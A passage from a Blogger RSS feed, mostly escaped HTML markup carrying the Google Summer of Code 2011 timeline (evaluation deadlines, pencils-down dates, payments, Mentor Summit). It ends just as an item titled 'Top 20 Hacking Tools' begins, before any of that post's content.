&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;July 15:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;ol class=&quot;c13&quot;&gt;&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mid-term evaluations  deadline;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Google begins issuing mid-term student  payments provided passing student survey is on file.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Interim Period:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Mentors give  students a helping hand and guidance on their projects.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;August 15:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 
c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Suggested &#39;pencils down&#39;  date. Take a week to scrub code, write tests, improve documentation,  etc.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;August 22:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Firm &#39;pencils  down&#39; date. Mentors, students and organization administrators can begin  submitting final evaluations to Google.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;August 26:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1 c5&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;19:00 UTC&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;ol class=&quot;c13&quot;&gt;&lt;li class=&quot;c7 c0&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Final evaluation deadline&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;li class=&quot;c0 c7&quot; style=&quot;margin-bottom: 0.25em;&quot;&gt;&lt;h3 style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Google begins issuing student and mentoring  organization payments provided forms and evaluations are on file.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/li&gt;
&lt;/ol&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;August 29:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c0 
c3&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Final results of GSoC  2011 announced&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;August 30:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 
c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;Students can begin  submitting required code samples to Google&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class=&quot;c2&quot; style=&quot;border-bottom-color: rgb(187, 187, 187); border-bottom-style: dashed; border-bottom-width: 1px; border-left-color: rgb(187, 187, 187); border-left-style: dashed; border-left-width: 1px; border-right-color: rgb(187, 187, 187); border-right-style: dashed; border-right-width: 1px; border-top-color: rgb(187, 187, 187); border-top-style: dashed; border-top-width: 1px; cursor: text; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; margin-bottom: 8px; margin-left: 8px; margin-right: 8px; margin-top: 8px; padding-bottom: 2px; padding-left: 5px; padding-right: 5px; padding-top: 2px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;October 22 &amp;amp; 23:&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;td class=&quot;c9&quot; style=&quot;border: 1px dashed rgb(187, 187, 187); color: black; cursor: text; font-family: Verdana,Arial,Helvetica,sans-serif; font-size: 10px; margin: 8px; padding: 2px 5px; text-align: left; vertical-align: top;&quot;&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;a href=&quot;http://www.google.com/url?q=http%3A%2F%2Fgsoc-wiki.osuosl.org%2Findex.php%2FMain_Page&amp;amp;sa=D&amp;amp;sntz=1&amp;amp;usg=AFQjCNHJsDftISUHYeJK7isEBNApPaCBag&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;Mentor Summit at Google&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: cyan;&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt; Representatives from each successfully participating  organization are invited to Google to greet, collaborate and code. Our  mission for the weekend: make the program even better, have fun and make  new friends.&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;h3 class=&quot;c3 c0&quot; style=&quot;font-size: 1.17em;&quot;&gt;&lt;span class=&quot;c1&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: white;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-size: small;&quot;&gt; &lt;/span&gt;&lt;/div&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;border-collapse: separate; color: black; font-family: Arial, Helvetica, sans-serif; font-size: 14px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-size: 13px;&quot;&gt;&lt;div class=&quot;article_content&quot; id=&quot;article-content-div&quot;&gt;&lt;br /&gt;
&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp;&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&amp;nbsp; &lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;h2 class=&quot;answer-title&quot; style=&quot;display: inline; float: left; font-size: 1.2em; margin: 0px; padding: 0px 0.5em 0px 0px;&quot;&gt;&lt;br /&gt;
&lt;/h2&gt;&lt;/div&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;</description><link>http://amit-spot.blogspot.com/2011/02/google-summer-of-code-2011_23.html</link><author>noreply@blogger.com (Amit Tyagi)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTZBtmZcTFC1OPCIPH3t1rbiujgAUzJ6EaaITqmp0_9-4ccc5Px7U2XZhI7rCvf3rVQ3NYN1MfpN9NiDa3XKeLe_WDZb2CYRafJUX2j1F1proleoptRaAM8OIri-WdXVGbTOiXhGO6tBI/s72-c/GSoC2011_300x200.png" height="72" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4201259273499093708.post-6483417527082947359</guid><pubDate>Wed, 23 Feb 2011 12:47:00 +0000</pubDate><atom:updated>2011-02-23T04:52:30.986-08:00</atom:updated><title>Top 20 Hacking Tools</title><description>&lt;div dir=&quot;ltr&quot; style=&quot;text-align: left;&quot; trbidi=&quot;on&quot;&gt;&lt;br /&gt;
